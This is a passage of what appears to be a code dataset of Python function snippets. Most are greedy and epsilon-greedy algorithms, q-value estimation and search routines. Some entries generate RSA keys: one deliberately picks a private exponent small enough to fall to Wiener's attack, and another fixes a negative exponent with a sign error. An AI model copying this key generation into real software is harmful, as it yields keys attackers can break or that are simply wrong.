str(n))\r\n print (\"phi(n) = \"+ str(phi))\r\n print (\"e = \"+ str(e))\r\n print (\"d = \"+ str(d))\r\n print\r\n return n, e, d", "def p_to_q(pvalues, display_on=False, cut1s=False, set_pi_hat=False):\n # because fisher's exact test gives highly skewed pvalue dists (with P of 1)\n # it may be necessary to remove the 1s before analysing\n if cut1s:\n pvalues = [ps for ps in pvalues if ps < 1]\n\n # order p-values:\n pvalues.sort()\n\n # estimate pi0:\n # evaluate pi0 across the range of lambda:\n lamrange = numpy.arange(0,0.95,0.01)\n #pbeaters = [ sum( p > lam for p in pvalues) for lam in lamrange ]\n #denominator = [ (len(pvalues) * (1 - lam)) for lam in lamrange ]\n pi0_lam = [ (sum( p > lam for p in pvalues) / (len(pvalues) * (1 - lam))) for lam in lamrange ]\n #pi0_hardway = []\n\n #for i in range(len(pbeaters)):\n # pi0_hardway += [ pbeaters[i] / denominator[i] ]\n #if pi0_lam != pi0_hardway:\n # print \"\\n\\n\\npi0_lam is not the same as pi0_hardway!\\n\\n\"\n #print \"pi0_hardway length:\", len(pi0_hardway)\n #print \"p_values size:\", len(pvalues)\n # fit cubic spline to data, then calculate value of pi0 for lambda = 1:\n tck = interpolate.splrep(lamrange, pi0_lam, s=3)\n splinecurve = interpolate.splev(numpy.arange(0,1.0,0.01), tck, der=0)\n pi0_hat = interpolate.splev(1, tck, der=0)\n tck_half = 0\n if pi0_hat > 1:\n tck_half = interpolate.splrep(lamrange[:85], pi0_lam[:85], s=3)\n spline_half = interpolate.splev(numpy.arange(0,1.0,0.01), tck_half, der=0)\n pi0_hat_half = interpolate.splev(1, tck_half, der=0)\n pi0_hat = pi0_hat_half\n verbalise(\"R\", \"pi0_hat > 1! Likely skewed P-value distribution. Converting to \", pi0_hat_half)\n if set_pi_hat:\n pi0_hat = set_pi_hat\n if display_on:\n fig = plt.figure()\n ax1 = fig.add_subplot(111)\n try:\n n, bins, patches = ax1.hist(pvalues, bins=20, facecolor='green', label=\"P-values\")\n except IndexError:\n ax1.plot(pvalues)\n plt.title('distribution of P-values')\n ax1.set_xlabel('lambda / P-value')\n ax1.set_ylabel('distribution #')\n plt.legend(loc=4)\n ax2 = ax1.twinx()\n ax2.plot(lamrange, pi0_lam, 'ro', numpy.arange(0,1.0,0.01), splinecurve, 'r', label='pi0_hat, s=3' )\n if tck_half != 0:\n ax2.plot(lamrange[:95], spline_half[:95], 'b', label='lambda < 0.85')\n ax2.set_ylabel('pi0_hat(lambda)')\n #ax1.plot(t, s1, 'b-')\n plt.legend(loc=1)\n plt.show()\n\n\n q_pm = pi0_hat * pvalues[-1] # q(pm)\n # creates an ordered list of q(p(i)) values.\n q_pi_list = [q_pm] + [ (pi0_hat * len(pvalues)*pvalues[i])/i for i in range(len(pvalues)-1,1,-1)]\n # \"The estimated q value for the ith most significant feature is q(p(i))\"\n q_val = {}\n for i in range(len(pvalues)):\n q_val[pvalues[-1 * (i+1)]] = min(q_pi_list[:i+1])\n\n return q_val", "def greedy(self) -> Action:\n return NotImplemented", "def make_epsilon_greedy_policy(Q, epsilon, nA):\n def policy_fn(observation):\n A = np.ones(nA, dtype=float) * epsilon / nA\n best_action = np.argmax(Q[observation])\n A[best_action] += (1.0 - epsilon)\n return A\n return policy_fn", "def greedy(constraint, indexes, m_l, parallel=False):\n\n selected = np.array([])\n plot = False\n choices = np.array(indexes)\n bar = ChargingBar(\"Calculating index set with greedy method\", max=m_l)\n\n for i in range(len(selected), m_l):\n # print(\"i = %d\" % i)\n start = time.time()\n\n def calc(node):\n return constraint(np.union1d(selected, node))\n\n if parallel:\n pickle_fix.calc = calc\n available_cores = odin.config.get(\"available_cores\", 4)\n pool = multiprocessing.Pool(processes=available_cores)\n values = pool.map(pickle_fix, choices)\n pool.close()\n else:\n # values: [float]\n values = list(map(calc, choices))\n\n greedy_choice = choices[np.argmax(values)]\n\n if plot:\n values = np.sort(values)\n oplt.plot(values)\n oplt.show()\n # current_best = np.max(values)\n\n selected = np.union1d(selected, [greedy_choice])\n choices = np.setdiff1d(choices, [greedy_choice])\n logging.debug(\"selected = %s; choice = %s; time = %.5f\" % (\n selected, greedy_choice, time.time() - start))\n bar.next()\n bar.finish()\n\n return selected", "def test_greedy_partition(self):\r\n\r\n #(non) partition into one bucket\r\n obs_part, obs_levels = greedy_partition({'1': 2,\r\n '2': 1,\r\n '3': 3}, 1)\r\n self.assertEquals(obs_levels, [6])\r\n self.assertEquals(obs_part, [['3', '1', '2']])\r\n\r\n # two buckets\r\n obs_part, obs_levels = greedy_partition({'1': 2,\r\n '2': 1,\r\n '3': 3}, 2)\r\n\r\n self.assertEquals(obs_levels, [3, 3])\r\n self.assertEquals(obs_part, [['3'], ['1', '2']])\r\n\r\n # larger input\r\n obs_part, obs_levels = greedy_partition({'1': 1, '2': 2, '3': 3,\r\n '4': 4, '5': 5, '6': 6}, 2)\r\n self.assertEquals(obs_levels, [11, 10])\r\n self.assertEquals(obs_part, [['6', '3', '2'], ['5', '4', '1']])", "def gen_greedy_surveys(nside=32, nexp=1, exptime=30., filters=['r', 'i', 'z', 'y'],\n camera_rot_limits=[-80., 80.],\n shadow_minutes=60., max_alt=76., moon_distance=30., ignore_obs='DD',\n m5_weight=3., footprint_weight=0.3, slewtime_weight=3.,\n stayfilter_weight=3., footprints=None):\n # Define the extra parameters that are used in the greedy survey. I\n # think these are fairly set, so no need to promote to utility func kwargs\n greed_survey_params = {'block_size': 1, 'smoothing_kernel': None,\n 'seed': 42, 'camera': 'LSST', 'dither': True,\n 'survey_name': 'greedy'}\n\n surveys = []\n detailer = detailers.Camera_rot_detailer(min_rot=np.min(camera_rot_limits), max_rot=np.max(camera_rot_limits))\n\n for filtername in filters:\n bfs = []\n bfs.append((bf.M5_diff_basis_function(filtername=filtername, nside=nside), m5_weight))\n bfs.append((bf.Footprint_basis_function(filtername=filtername,\n footprint=footprints,\n out_of_bounds_val=np.nan, nside=nside), footprint_weight))\n bfs.append((bf.Slewtime_basis_function(filtername=filtername, nside=nside), slewtime_weight))\n bfs.append((bf.Strict_filter_basis_function(filtername=filtername), stayfilter_weight))\n # Masks, give these 0 weight\n bfs.append((bf.Zenith_shadow_mask_basis_function(nside=nside, shadow_minutes=shadow_minutes,\n max_alt=max_alt), 0))\n bfs.append((bf.Moon_avoidance_basis_function(nside=nside, moon_distance=moon_distance), 0))\n\n bfs.append((bf.Filter_loaded_basis_function(filternames=filtername), 0))\n bfs.append((bf.Planet_mask_basis_function(nside=nside), 0))\n\n weights = [val[1] for val in bfs]\n basis_functions = [val[0] for val in bfs]\n surveys.append(Greedy_survey(basis_functions, weights, exptime=exptime, filtername=filtername,\n nside=nside, ignore_obs=ignore_obs, nexp=nexp,\n detailers=[detailer], **greed_survey_params))\n\n return surveys", "def greedy(self):\n # for each node, find the incoming link with the highest score.\n max_scores = {}\n max_sources = {}\n for source, target in self.iteredges():\n score = self.get_score(source, target)\n max_score = max_scores.get(target)\n if max_score is None or score > max_score:\n max_scores[target] = score\n max_sources[target] = source\n # then build a graph out of just these links.\n succs = dict((n, []) for n in self)\n for target, source in max_sources.items():\n succs[source].append(target)\n return Digraph(succs, self.get_score, self.get_label)", "def e_greedy_sampling(self, k_array, reward_array, number_slots):\n\n # successes and total draws\n success_count = reward_array.sum(axis=1)\n total_count = k_array.sum(axis=1)\n\n # ratio of successes vs total\n success_ratio = success_count / total_count\n\n # choosing best greedy action or random depending with epsilon probability\n if np.random.random() < self.epsilon:\n\n # returning random action, excluding best\n return np.random.choice(np.delete(list(range(number_slots)), np.argmax(success_ratio)))\n\n # else return best\n else:\n\n # returning best greedy action\n return np.argmax(success_ratio)", "def __call__(self, state, q_values):\n\n if self.policy_type == \"greedy\":\n is_greedy = True\n else:\n is_greedy = random.uniform(0, 1) > self.epsilon\n\n if is_greedy :\n # choose greedy action\n index_action = np.argmax(q_values[state])\n else:\n # get a random action\n index_action = random.randint(0,3)\n\n return actions_dict[index_action]", "def genKeys(p, q):\n n = p*q\n phi_of_n = (p-1)*(q-1)\n e = 0\n \n #find a e less than n that is coprime with phi(n)\n count=2\n while count:\n gcd = gcd_iter(phi_of_n,count)\n if gcd==1:\n e = count\n break\n count+=1\n \n # finding the mutiplicative inverse of e and phi(n)\n d = ext_Euclid(e,phi_of_n)\n\n #positive values of d\n if d<0:\n d = phi_of_n - d\n return n,e,d", "def OneByOneStrategy(I_list,box_list):\n SortedItems = quick_sort(I_list)\n lemon = []\n for i in box_list:\n for item in range(len(SortedItems)):\n if i.max_cap - i.curr_cap == 0:\n break\n if SortedItems[item].weight <= i.max_cap - i.curr_cap:\n if SortedItems[item] not in lemon:\n lemon.append(SortedItems[item])\n i.items_list.append(SortedItems[item])\n i.curr_cap += SortedItems[item].weight\n else:\n pass\n print('Results from Greedy Strategy 3')\n if len(lemon) != len(SortedItems):\n print('Unable to pack all items')\n else:\n print('All items successfully packed!')\n for s in box_list:\n print('Box',s.id,'of weight capacity',s.max_cap,'contains:')\n for item in s.items_list:\n print(item.name,'of weight',item.weight)\n for item in SortedItems:\n if item not in lemon:\n print(item.name,'of weight',item.weight,'got left behind')\n print('\\n')", "def choose_epsilon_greedy(self, state: Tuple[int, ...], valid_actions: Tuple[int, ...]) -> int:\n if random.random() < self.__epsilon:\n return self.choose_uniform(valid_actions)\n return self.choose_greedy(state, valid_actions)", "def epsilon_greedy(Q, epsilon, n_actions, s, train=False):\n if train or np.random.rand() < epsilon:\n action = np.argmax(Q[s, :])\n else:\n action = np.random.randint(0, n_actions)\n return action", "def greedy_learn_search(self,db,labels):\n queue = PriorityQueue()\n dolowmem = (self.lowmem == True)\n numidsets = 0\n root_ids = range(len(labels))\n queue.push((self.root,root_ids),len(labels))\n numnodes = 1\n deepest = 0\n err = 0\n while len(queue) > 0 and numnodes+2 <= self.maxnodes:\n #print \"%d nodes, priority %d\"%(numnodes,queue.nextkey())\n nerr = queue.nextkey()\n (node,trainingset) = queue.pop()\n #print \"Greedy learn\",len(trainingset)\n if trainingset is None:\n trainingset = self.identify_examples(db,labels,node)\n if node.depth >= self.maxdepth or len(trainingset) <= self.minexamples:\n #print \" Hit depth or training set limit\"\n node.pick_best_label(db,labels,trainingset)\n err += misclassification_error([labels[id] for id in trainingset])\n continue\n features = self.feature_subset(node,db,labels,trainingset)\n cost = node.pick_best_split(db,labels,trainingset,features)\n numidsets -= len(trainingset)\n #do a split\n if node.type == 'v':\n continue\n elif node.type == 's':\n #discrete split\n node.children = dict()\n #select sub-indices\n Eids = defaultdict(list)\n noneids = []\n for id in trainingset:\n v = db[node.feature,id]\n if v is None:\n #item doesn't exist, it's a missing value\n noneids.append(id)\n else:\n Eids[v].append(id)\n #determine whether to switch to low-memory mode\n if not dolowmem and self.lowmem=='auto':\n for v,vids in Eids.iteritems():\n numidsets += len(vids)+len(noneids)\n if numidsets > self.lowmem_threshold:\n print \"Decision tree learner switching to low-memory mode\"\n dolowmem = True\n trainingset = None\n\n\n numnodes += len(Eids)\n #print \"Split sizes\",[len(v) for v in Eids.itervalues()]\n #print \"None size\",len(noneids)\n for v,vids in Eids.iteritems():\n #print \"->\",len(vids),\"+\",len(noneids)\n #recurse\n c = DecisionTreeNode(node)\n node.children[v] = c\n err = misclassification_error([labels[id] for id in vids+noneids])\n cids = (None if dolowmem else vids+noneids)\n queue.push((c,cids),err)\n if c.depth > deepest:\n deepest = c.depth\n print \"Decision tree learner: Reached node with depth\",deepest\n else:\n #do an inequality split\n assert node.type == 'i',\"Got a weird type? \"+str(node.type)\n leftids = []\n rightids = []\n for id in trainingset:\n val = db[node.feature,id]\n if val is not None:\n if val <= node.value: leftids.append(id)\n else: rightids.append(id)\n else:\n leftids.append(id)\n rightids.append(id)\n if len(leftids)==0 or len(rightids)==0:\n print \"node feature \"+str(node.feature)+\" doesn't have a valid split value \"+str(node.value)\n vals = [db[node.feature,id] for id in trainingset if db[node.feature,id]!=None]\n print \"min,max of training set:\",min(vals),max(vals)\n print \"cost is\",cost\n raw_input()\n assert len(leftids) > 0 and len(rightids) > 0\n if not dolowmem and self.lowmem=='auto':\n numidsets += len(leftids) + len(rightids)\n if numidsets > self.lowmem_threshold:\n print \"Decision tree learner switching to low-memory mode\"\n dolowmem = True\n trainingset = None\n numnodes += 2\n c1 = DecisionTreeNode(node)\n c2 = DecisionTreeNode(node)\n node.children = {0:c1,1:c2}\n #print \"->\",len(leftids)\n #print \"->\",len(rightids)\n err1 = misclassification_error([labels[id] for id in leftids])\n err2 = misclassification_error([labels[id] for id in rightids])\n if dolowmem:\n leftids = None\n rightids = None\n queue.push((c1,leftids),err1)\n queue.push((c2,rightids),err2)\n if c1.depth > deepest:\n deepest = c1.depth\n print \"Decision tree learner: Reached node with depth\",deepest\n #end of recursion. for the rest of the nodes still in the queue, make them leaf nodes\n if len(queue) > 0:\n print \"%d nodes remaining in queue, setting to leaves\"%(len(queue),)\n for (node,trainingset) in queue:\n node.pick_best_label(db,labels,trainingset)\n err += misclassification_error([labels[id] for id in trainingset])\n return err", "def greedy_path():\n itinerary = []\n cities = all_cities(data_set)\n starting_city = randomize_city_start(cities.keys()) # start from a random city\n # print \"starting_city: %s\" % starting_city\n cities_visited = {}\n \n # iterate through all cities\n count = 1\n while True:\n possible_routes = []\n #distance = []\n # print \"starting_city: %s\" % starting_city\n for path in data_set:\n # we only start with city that we have assigned in starting_city\n if starting_city in path['city_start']:\n # we don't go to cities we have visited\n if path['city_end'] in cities_visited:\n continue\n else:\n # print \"path: \", path\n possible_routes.append(path) # add the city if not in the list\n \n if not possible_routes:\n break\n # append this to itinerary\n route = get_shortest_route(possible_routes)\n count += 1\n itinerary.append(route)\n # add this city to visited_cities list\n cities_visited[route[0]] = count\n starting_city = route[1]\n \n return itinerary", "def greedy_schedule(s, f, verbose=False):\n X = [False for p in range(n)]\n a = [(s[i], f[i]) for i in range(n)]\n count = 1\n X[count] = 1\n for i in range(2, n):\n if s[i] > f[X[count]]:\n count += 1\n X[count] = i\n\n \"\"\"after this loop, an entry in X will contain either the start time\n of a task (denoting that we should use it) or it will contain False,\n denoting that we should skip it.\"\"\"\n if verbose:\n set_of_classes = set([])\n for item in X:\n if item:\n set_of_classes.add(item)\n print set_of_classes", "def policies(self, QTable, epsilon, state, next_states, action_to_do): # Inspiration from https://www.geeksforgeeks.org/q-learning-in-python/?fbclid=IwAR1UXR88IuJBhhTakjxNq_gcf3nCmJB0puuoA46J8mZnEan_qx9hhoFzhK8\r\n num_actions = 5 # 5 actions-value, [moved_out, into_goal, send_opp_home, send_self_home, move_token] \r\n def epsilonGreedyPolicy(): \r\n tmp_state = str(state.state[0])\r\n valid_actions = np.append(action_to_do, True) # the True appended is move_token\r\n valid_act_len = len(np.where(valid_actions==True)[0])\r\n\r\n Action_probabilities = np.ones(num_actions, dtype = float) * epsilon / valid_act_len # divides probability based on number of valid actions and epsilon (each 0.025 if 4 actions) \r\n Action_probabilities = np.multiply(Action_probabilities, valid_actions)\r\n\r\n # If same values in QTable choose random valid action \r\n best_action = np.argmax(QTable[tmp_state]) # Find index of action which gives highest QValue\r\n # Check if valid action else find new best action\r\n if not valid_actions[best_action]:\r\n actions = np.argsort(-QTable[tmp_state]) # descending order of action values\r\n for i in range(len(valid_actions)):\r\n if valid_actions[actions[i]]:\r\n best_action = actions[i]\r\n break\r\n\r\n Action_probabilities[best_action] += (1.0 - epsilon) # Assigns rest probability to best action so probability sums to 1\r\n\r\n return Action_probabilities \r\n\r\n def greedyPolicy():\r\n tmp_state = str(state.state[0])\r\n valid_actions = np.append(action_to_do, True) # the True appended is move_token\r\n\r\n Action_probabilities = np.zeros(num_actions, dtype = float)\r\n\r\n best_action = np.argmax(QTable[tmp_state]) # Find index of action which gives highest QValue\r\n # Check if valid action else find new best action\r\n if not valid_actions[best_action]:\r\n actions = np.argsort(-QTable[tmp_state]) # descending order of action values\r\n for i in range(len(valid_actions)):\r\n if valid_actions[actions[i]]:\r\n best_action = actions[i]\r\n break\r\n\r\n\r\n Action_probabilities[best_action] += 1.0\r\n return Action_probabilities\r\n\r\n\r\n if(self.__chosenPolicy == \"epsilon greedy\"):\r\n return epsilonGreedyPolicy \r\n if(self.__chosenPolicy == \"greedy\"):\r\n return greedyPolicy", "def Pollard_pm1(n, primes, max_B=1000000):\n B = 10\n g = 1\n while B < max_B and g < n:\n a = randint(2, n - 2)\n g = gcd(a, n)\n if g != 1:\n return g\n for p in primes:\n if p >= B:\n break\n pd = 1 # p^d\n while pd * p <= B:\n pd *= p\n a = powmod(a, pd, n)\n g = gcd(a - 1, n)\n if g != 1 and g != n:\n return g\n B *= 2\n return 1", "def make_epsilon_greedy_policy(self, Q, epsilon, nA):\n\n def policy_fn(observation,p):\n A = np.ones(nA, dtype=float) * epsilon / nA\n q=Q(observation,p)\n\n best_action = np.argmax(q)\n print(\"action called:\",self.env.action_labels[best_action])\n A[best_action] += (1.0 - epsilon)\n return A\n\n return policy_fn", "def rnd_pset(self):\n\t\treturn [rnd() * 10, rnd() * 10, rnd() * 12 * 15, rnd() * 12 * 15]", "def greedy_policy(self):\n # print(self.weights)\n policy = defaultdict(lambda: 0)\n\n for entry, values in self.weights.items():\n policy[entry] = np.argmax(self.weights[entry])\n # print(policy)\n\n return policy", "def select_greedy(self,time,a1,a2,*args):\n\t\tareas = []\n\t\tareas.append(a1)\n\t\tareas.append(a2)\n\t\tareas.extend(args)\n\t\tareas_sorted = sorted(areas,reverse=True)\n\t\tresult = []\n\t\tcandidates = [[wait[time][1] if wait[time]!=None else None \\\n\t\t\t\t\t for wait in area.w] for area in areas]\n\t\tused_content = set()\n\t\tfor area,cands in zip(areas_sorted,candidates):\n\t\t\tcands.sort(reverse=True)\n\t\t\tfor i in range(len(cands)):\n\t\t\t\tif cands[i] == None:\n\t\t\t\t\tresult.append((area,None))\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tif cands[i].id not in used_content:\n\t\t\t\t\t\tresult.append((area,cands[i]))\n\t\t\t\t\t\tused_content.add(cands[i].id)\n\t\t\t\t\t\tbreak\n\t\tprint \"greedy best solution:\",result\n\t\tprint \"greedy best cost:\",sum([x.weight*y.value if y!= None \\\n\t\t\t\t\t\t\t\t\telse 0 for x,y in result])", "def p_to_q_storey_tibshirani(pvalues, display_on=False, cut1s=False, set_pi_hat=False):\n # because fisher's exact test gives highly skewed pvalue dists (with P of 1)\n # it may be necessary to remove the 1s before analysing\n if cut1s:\n pvalues = [ps for ps in pvalues if ps < 1]\n\n # order p-values:\n pvalues.sort()\n\n # estimate pi0:\n # evaluate pi0 across the range of lambda:\n lamrange = np.arange(0,0.95,0.01)\n #pbeaters = [ sum( p > lam for p in pvalues) for lam in lamrange ]\n #denominator = [ (len(pvalues) * (1 - lam)) for lam in lamrange ]\n pi0_lam = [ (sum( p > lam for p in pvalues) / (len(pvalues) * (1 - lam))) for lam in lamrange ]\n #pi0_hardway = []\n\n #for i in range(len(pbeaters)):\n # pi0_hardway += [ pbeaters[i] / denominator[i] ]\n #if pi0_lam != pi0_hardway:\n # print \"\\n\\n\\npi0_lam is not the same as pi0_hardway!\\n\\n\"\n #print \"pi0_hardway length:\", len(pi0_hardway)\n #print \"p_values size:\", len(pvalues)\n # fit cubic spline to data, then calculate value of pi0 for lambda = 1:\n tck = interpolate.splrep(lamrange, pi0_lam, s=3)\n splinecurve = interpolate.splev(np.arange(0,1.0,0.01), tck, der=0)\n pi0_hat = interpolate.splev(1, tck, der=0)\n tck_half = 0\n if pi0_hat > 1:\n tck_half = interpolate.splrep(lamrange[:85], pi0_lam[:85], s=3)\n spline_half = interpolate.splev(np.arange(0,1.0,0.01), tck_half, der=0)\n pi0_hat_half = interpolate.splev(1, tck_half, der=0)\n pi0_hat = pi0_hat_half\n verbalise(\"R\", \"pi0_hat > 1! Likely skewed P-value distribution. Converting to \", pi0_hat_half)\n if set_pi_hat:\n pi0_hat = set_pi_hat\n if display_on:\n fig = plt.figure()\n ax1 = fig.add_subplot(111)\n try:\n n, bins, patches = ax1.hist(pvalues, bins=20, facecolor='green', label=\"P-values\")\n except IndexError:\n ax1.plot(pvalues)\n plt.title('distribution of P-values')\n ax1.set_xlabel('lambda / P-value')\n ax1.set_ylabel('distribution #')\n plt.legend(loc=4)\n ax2 = ax1.twinx()\n ax2.plot(lamrange, pi0_lam, 'ro', np.arange(0,1.0,0.01), splinecurve, 'r', label='pi0_hat, s=3' )\n if tck_half != 0:\n ax2.plot(lamrange[:95], spline_half[:95], 'b', label='lambda < 0.85')\n ax2.set_ylabel('pi0_hat(lambda)')\n #ax1.plot(t, s1, 'b-')\n plt.legend(loc=1)\n plt.show()\n\n\n q_pm = pi0_hat * pvalues[-1] # q(pm)\n # creates an ordered list of q(p(i)) values.\n q_pi_list = [q_pm] + [ (pi0_hat * len(pvalues)*pvalues[i])/i for i in range(len(pvalues)-1,1,-1)]\n # \"The estimated q value for the ith most significant feature is q(p(i))\"\n q_val = {}\n for i in range(len(pvalues)):\n q_val[pvalues[-1 * (i+1)]] = min(q_pi_list[:i+1])\n\n return q_val", "def _compute_next_all_q_values(self, next_time_steps, info):\n network_observation = next_time_steps.observation\n\n if self._observation_and_action_constraint_splitter is not None:\n network_observation, _ = self._observation_and_action_constraint_splitter(\n network_observation)\n\n next_target_q_values, _ = self._target_q_network(\n network_observation, step_type=next_time_steps.step_type)\n #batch_size = (\n # next_target_q_values.shape[0] or tf.shape(next_target_q_values)[0])\n #dummy_state = self._target_greedy_policy.get_initial_state(batch_size)\n # Find the greedy actions using our target greedy policy. This ensures that\n # action constraints are respected and helps centralize the greedy logic.\n #greedy_actions = self._target_greedy_policy.action(\n # next_time_steps, dummy_state).action\n\n return next_target_q_values", "def ghost_greedy(self,current,ghost,g_pos):\n x, y, pos ,(st,b),start,p_prob = g_pos[ghost]\n node = self.nodes_array[x][y].getNeighborByDirection(pos)\n if st > 0 and b and node is not None:\n st = max(st-1,0)\n return [(1,(node.i,node.j,pos,(st,not b),start,p_prob))]\n\n rpos = Actions.reverseDirection(pos)\n node = self.nodes_array[x][y]\n priority = [Directions.NORTH, Directions.WEST, Directions.SOUTH, Directions.EAST]\n node_neig = [node.up, node.left, node.down, node.right]\n prio = list()\n nodes = list()\n for i in range(len(node_neig)):\n if node_neig[i]:\n prio.append(priority[i])\n nodes.append((node_neig[i].i,node_neig[i].j))\n\n if len(prio) > 1 and rpos != Directions.STOP:\n for i in range(len(prio)):\n if prio[i] == rpos:\n del prio[i]\n del nodes[i]\n break\n\n arg = min if st == 0 else max\n dist_list = [manhattanDistance(pos, (current.i,current.j)) for pos in nodes]\n ptr_val = arg(dist_list)\n pos = []\n st = st - 1 if st - 1 > 0 else 0\n for i in range(len(dist_list)):\n if dist_list[i] == ptr_val:\n if not st:\n pos.append((nodes[i][0],nodes[i][1],prio[i],(0,False),start,p_prob))\n else:\n pos.append((x,y,prio[i],(st,True),start,p_prob))\n\n pos_p = 1./len(pos)\n return [(pos_p,possibility) for possibility in pos]", "def play_epsilon_greedy_policy(self, board):\n policy = np.random.choice(['random', 'q_agent'], 1, p=[self.epsilon, 1-self.epsilon])[0]\n if policy == 'random':\n move, _ = RandomAgent.play(board)\n else:\n move, q_value = self.play(board)\n self.after_move()\n return move, policy", "def astar(grid, heuristic):\r\n\r\n print (grid.getStart())\r\n frontier = PriorityQueue()\r\n frontierCpy = {}\r\n\r\n goal = grid.getGoals()[0]\r\n\r\n startX = grid.getStart()[0]\r\n startY = grid.getStart()[1]\r\n startNode = Node(((startX, startY), 0), None)\r\n\r\n init_heu = heuristic(startNode.cell[0], goal)\r\n frontierCpy[startNode.cell[0]] = init_heu\r\n frontier.put((init_heu, 0, startNode))\r\n\r\n while frontier.qsize() != 0:\r\n tup = frontier.get()\r\n\r\n currNode = tup[2]\r\n currG = tup[1] * -1\r\n grid.addVisited(currNode.cell[0])\r\n frontierCpy.pop(currNode.cell[0], None)\r\n\r\n if currNode.cell[0] == goal:\r\n path = []\r\n while currNode != None:\r\n path.insert(0, currNode.cell[0])\r\n currNode = currNode.parent\r\n grid.setPath(path)\r\n return path\r\n\r\n\r\n neighbors = grid.getNeighbors(currNode.cell[0])\r\n\r\n for n in neighbors:\r\n if n[0] not in grid.getVisited():\r\n newNode = Node(n, currNode)\r\n\r\n h = heuristic(n[0], goal)\r\n\r\n oneStepCost = n[1]\r\n g = oneStepCost + currG\r\n if n[0] not in frontierCpy or frontierCpy[n[0]] > h + g:\r\n frontier.put((h+g, -1*g, newNode))\r\n frontierCpy[n[0]] = h+g\r\n print(\"CANT FIND A PATH\")", "def main(num_q: int, point_list: List[int])-> int:\n dp_table", "def greedy_cliques(cliques,clusters,matrix):\n if len(clusters) == 0:\n return cliques\n cid = random.choice(range(len(clusters)))\n cluster0 = clusters.pop(cid)\n pid = random.choice(range(len(cluster0)))\n p0 = cluster0.pop(pid)\n clique = [p0]\n \n for cid,cluster in enumerate(clusters):\n dist = float('-Inf')\n idx = 0\n for i,p in enumerate(cluster):\n d = sum([matrix[p.id][c.id] for c in clique])\n if d > dist:\n dist = d\n idx = i\n item = cluster.pop(idx)\n clique.append(item)\n if len(cluster) <= 0:\n clusters.pop(cid)\n if len(cluster0) > 0:\n clusters.append(cluster0)\n cliques.append(clique)\n return greedy_cliques(cliques,clusters,matrix)", "def greedy_MAP_assignment(theta,random_runs = 10,heur = 'first'):\r\n N = theta.shape[0]\r\n scipy.random.seed()\r\n max_p = -scipy.inf\r\n for k in range(random_runs):\r\n A = scipy.random.randint(2,size = N)\r\n improved = True\r\n p = A.dot( theta.dot(A) )\r\n while improved:\r\n improved = False\r\n if heur == 'first':\r\n p2 = -scipy.inf\r\n perm = scipy.random.permutation(N)\r\n for s in perm:\r\n #dp: change in p if A[i] bit is reversed\r\n dp = (1-2*A[s])*( A.dot(theta[s,:]+ theta[:,s]) ) + theta[s,s]\r\n if dp>0:\r\n p2 = dp\r\n break\r\n\r\n if heur == 'best':\r\n dp = (1-2*A)*( A.dot(theta + theta.T) ) + scipy.diag(theta)\r\n p2,s = dp.max(), dp.argmax()\r\n if p2 > 0:\r\n A[s] = 1-A[s]\r\n improved = True\r\n p += p2\r\n if p>max_p:\r\n greedy_A,max_p = A.copy(),p\r\n return greedy_A.astype(int),max_p", "def EpsGreedy(self, actions, game_state):\n if random.random() < self.epsilon:\n return random.choice(actions)\n else:\n return self.best_action(actions, game_state)", "def make_epsilon_greedy_policy(estimator, epsilon, nA):\n def policy_fn(observation):\n A = np.ones(nA, dtype=float) * epsilon / nA\n q_values = estimator.predict(observation)\n# print(q_values)\n best_action = np.argmax(q_values)\n A[best_action] += (1.0 - epsilon)\n return A\n return policy_fn", "def gen_greedy_surveys(nside, nexp=1, target_map=None):\n norm_factor = calc_norm_factor(target_map)\n # Let's remove the bluer filters since this should only be near twilight\n filters = ['r', 'i', 'z', 'y']\n surveys = []\n\n detailer = detailers.Camera_rot_detailer(min_rot=-87., max_rot=87.)\n\n for filtername in filters:\n bfs = []\n bfs.append(bf.M5_diff_basis_function(filtername=filtername, nside=nside))\n bfs.append(bf.Target_map_basis_function(filtername=filtername,\n target_map=target_map[filtername],\n out_of_bounds_val=np.nan, nside=nside,\n norm_factor=norm_factor))\n bfs.append(bf.Slewtime_basis_function(filtername=filtername, nside=nside))\n bfs.append(bf.Strict_filter_basis_function(filtername=filtername))\n # Masks, give these 0 weight\n bfs.append(bf.Zenith_shadow_mask_basis_function(nside=nside, shadow_minutes=60., max_alt=76.))\n bfs.append(bf.Moon_avoidance_basis_function(nside=nside, moon_distance=40.))\n\n bfs.append(bf.Filter_loaded_basis_function(filternames=filtername))\n bfs.append(bf.Planet_mask_basis_function(nside=nside))\n\n weights = np.array([3.0, 0.3, 3., 3., 0., 0., 0., 0.])\n surveys.append(Greedy_survey(bfs, weights, block_size=1, filtername=filtername,\n dither=True, nside=nside, ignore_obs='DD', nexp=nexp,\n detailers=[detailer]))\n\n return surveys", "def generate_keys(self):\n\n\t\tcondition = False\n\t\t\n\t\t\t\n\t\twhile (not condition) :\n\t\t\t# step 1 : chose random primary numbers p and q\n\t\t\tn = generate_prime(self.min_bound,self.max_bound)\n\t\t\tself._p = n\n\t\t\tn = generate_prime(self.min_bound,self.max_bound)\n\t\t\twhile(n == self._p):\n\t\t\t\tn = generate_prime(self.min_bound,self.max_bound)\n\t\t\tself._q = n\n\n\t\t\t#step 2 : compute n = pq\n\t\t\tself.n = self._p * self._q\n\t\t\t\n\t\t\ta = find_invpow(self.n,4) // 3\n\t\t\tcondition = (self._p > self._q) and (self._p < 2 * self._q)\n\t\t\tif (not condition) :\n\t\t\t\tcontinue\n\n\t\t\tprint(\"step one OK\")\n\n\t\t\t#step 3 : compute phi(n)\n\t\t\tself._phi = (self._p - 1) * (self._q - 1)\n\n\t\t\t#step 4 : chose the exponent\n\t\t\tn = randint(100,a)\n\t\t\twhile (gcd(self._phi,n) != 1):\n\t\t\t\tn = randint(100,self._phi)\n\t\t\tself._d = n\n\n\t\t\t#step 5 : compute d (private key)\n\t\t\tself.e = euclide_algorithm(self._d, self._phi)[\"U\"] % self._phi\n\n\t\t\tcondition = (self._d < a)\n\n\t\tprint(\"p = \", self._p)\n\t\tprint(\"q = \", self._q)\n\t\tprint(\"d = \", self._d)", "def gen_primes():\n D = defaultdict(list)\n q = 2\n while True:\n if q not in D:\n\n yield q \n D[q * q] = [q]\n else:\n for p in D[q]:\n D[p + q].append(p)\n del D[q]\n q += 1", "def useLottery(ipSet):\n\t# make list of possible predicates and remove duplicates\n\tpredicates = [ip.predicate for ip in ipSet]\n\tseen = set()\n\tseen_add = seen.add\n\tpredicates = [pred for pred in predicates if not (pred in seen or seen_add(pred))]\n\n\t#choose the predicate\n\tweightList = np.array([pred.num_tickets for pred in 